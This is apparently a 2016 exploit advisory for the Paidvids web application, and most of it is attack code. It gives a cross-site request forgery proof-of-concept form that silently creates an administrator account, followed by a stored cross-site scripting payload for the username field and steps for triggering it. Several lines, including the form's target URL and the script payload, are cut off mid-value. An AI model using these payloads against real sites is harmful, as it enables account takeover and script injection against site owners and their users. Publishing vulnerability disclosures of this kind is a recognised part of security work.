# Date: 11/06/2016
# Exploit Author: Murat YILMAZLAR
# Vendor Homepage: http://paidtasks.net/
# Demo Page: http://video.paidtasks.net/
# Version: 1.0
###########################
# CSRF Add Admin Exploit:
< -- bug code started -- >
<html>
<body>
<form action="http://video.
<input type="hidden" name="username" value="murrat" />
<input type="hidden" name="email" value="murrat@protonmail&#
<input type="hidden" name="pass" value="" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="country" value="82" />
<input type="hidden" name="coins" value="0.20" />
<input type="hidden" name="admin" value="1" />
<input type="hidden" name="submit" value="Submit" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
< -- end of the bug code -- >
###########################
# Stored XSS Vulnerability:
Paidvids is vulnerable to a stored XSS when an user is edited with an
malicious payload on the username field. The javascript payload is executed when another admin or editor tries to use the
"All Members" section from left bar.
# How To Exploit:
Go to the admin panel and edit a existed user. Change the "username" to :
"><img src="c" onerror="alert(document.
Here is your alert.
PoC: http://prntscr.com/bew0df
###########################